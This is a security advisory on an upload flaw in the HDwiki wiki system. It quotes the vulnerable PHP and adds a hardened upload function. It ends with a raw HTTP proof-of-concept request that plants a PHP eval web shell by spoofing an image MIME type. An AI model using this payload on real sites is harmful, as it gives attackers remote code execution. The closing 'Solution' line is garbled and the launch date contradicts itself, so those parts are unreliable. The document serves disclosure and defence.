As the first Chinese Wiki system with independent intellectual property rights in China, HDwiki was officially launched by Interactive Online (Beijing) Technology Co., Ltd. on September 10, November 28, 2006. It aims to provide a free, easy-to-use and powerful Wiki site-building system for Wikipedia fans at home and abroad, and its launch fills a gap in Chinese Wiki website construction systems.
However, some of HDwiki's upload functions have a security vulnerability: a crafted multipart request bypasses the upload restriction, which ultimately allows control of the remote site.
Detailed description:
lib/file.class.php:

    function uploadfile($attachment, $target, $maxsize = 1024, $is_image = 1) {
        $result = array('result' => false, 'msg' => 'upload mistake');
        if ($is_image) {
            $attach = $attachment;
            $filesize = $attach['size'] / 1024;
            if (0 == $filesize) {
                $result['msg'] = '上传错误';   // "upload error"
                return $result;
            }
            // Only the client-supplied MIME type ($_FILES[...]['type']) is inspected;
            // the file extension is never checked.
            if (substr($attach['type'], 0, 6) != 'image/') {
                $result['msg'] = '格式错误';   // "format error"
                return $result;
            }
            if ($filesize > $maxsize) {
                $result['msg'] = '文件过大';   // "file too large"
                return $result;
            }
        } else {
            $attach['tmp_name'] = $attachment;
        }
        $filedir = dirname($target);
        file::forcemkdir($filedir);
        if (@copy($attach['tmp_name'], $target) || @move_uploaded_file($attach['tmp_name'], $target)) {
            $result['result'] = true;   // success path implied by the default 'result' => false
        }
        return $result;   // remainder of the function is not shown on the original page
    }

No further check is performed before the file is written to $target.

Triggered in attachment.php:

    function douploadimg() {
        $imgname = $_FILES['photofile']['name'];
        // The extension is taken from the client-supplied filename and reused in the
        // destination path, so an uploaded "z.php" is stored with a .php extension.
        $extname = file::extname($imgname);
        $destfile = $_ENV['attachment']->makepath($extname);
        $arrupload = file::uploadfile($_FILES['photofile'], $destfile);
        // remainder of the function is not shown on the original page
    }
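A hardened version of this check, written here as an added example (not HDwiki's own code): the function name safe_upload_image(), the upload directory argument and the image allowlist are assumptions.

```php
<?php
// Added example, not HDwiki's code: a hardened replacement for the checks in
// uploadfile() / douploadimg(). Function and directory names are assumptions.
function safe_upload_image(array $attach, string $uploaddir, int $maxsize = 1024): array
{
    $result = ['result' => false, 'msg' => 'upload error'];

    // Reject anything PHP itself did not receive as an upload.
    if (($attach['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($attach['tmp_name'])) {
        return $result;
    }
    $filesize = $attach['size'] / 1024;
    if ($filesize == 0 || $filesize > $maxsize) {
        $result['msg'] = 'file empty or too large';
        return $result;
    }

    // 1. Extension allowlist. The original code never looks at the extension, and
    //    makepath() reuses whatever the client sent, so "z.php" stays "z.php".
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'png' => 'image/png', 'gif' => 'image/gif'];
    $ext = strtolower(pathinfo($attach['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        $result['msg'] = 'format error';
        return $result;
    }

    // 2. Determine the type from the bytes on disk, not from $attach['type'],
    //    which is just the client-controlled "Content-Type: image/image" header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($attach['tmp_name']);
    if ($mime !== $allowed[$ext] || @getimagesize($attach['tmp_name']) === false) {
        $result['msg'] = 'format error';
        return $result;
    }

    // 3. Server-generated name: the client never chooses the stored path.
    $target = rtrim($uploaddir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!is_dir($uploaddir) && !mkdir($uploaddir, 0755, true)) {
        return $result;
    }
    if (!move_uploaded_file($attach['tmp_name'], $target)) {
        return $result;
    }
    chmod($target, 0644);   // readable, not executable, not world-writable

    return ['result' => true, 'msg' => '', 'path' => $target];
}
```

Even a file that passes finfo and getimagesize can carry script text in its metadata, so the attachment directory should additionally be served with script execution disabled (for example, a web-server rule that removes the PHP handler for that directory).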
Proof of vulnerability:
POST /hdwiki/index.php?attachment-uploadimg HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.bkjia.com/
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7db261e100f2e
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)
Host: www.2cto.com
Content-Length: 370
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Keys=1298002704449; hd_sid=raG13H; hd_auth=4113YBBXXB13XtdR6EXTA1Cb9BuhZMK%keys%2F5gc6pLm9fZ%2Bdgv68MT; hd_searchtime=1300983373

-----------------------------7db261e100f2e
Content-Disposition: form-data; name="MAX_FILE_SIZE"

30000
-----------------------------7db261e100f2e
Content-Disposition: form-data; name="photofile"; filename="C:\fucker\z.php"
Content-Type: image/image

zzz<?eval($_REQUEST[z])?>
-----------------------------7db261e100f2e--
Solution:
Amount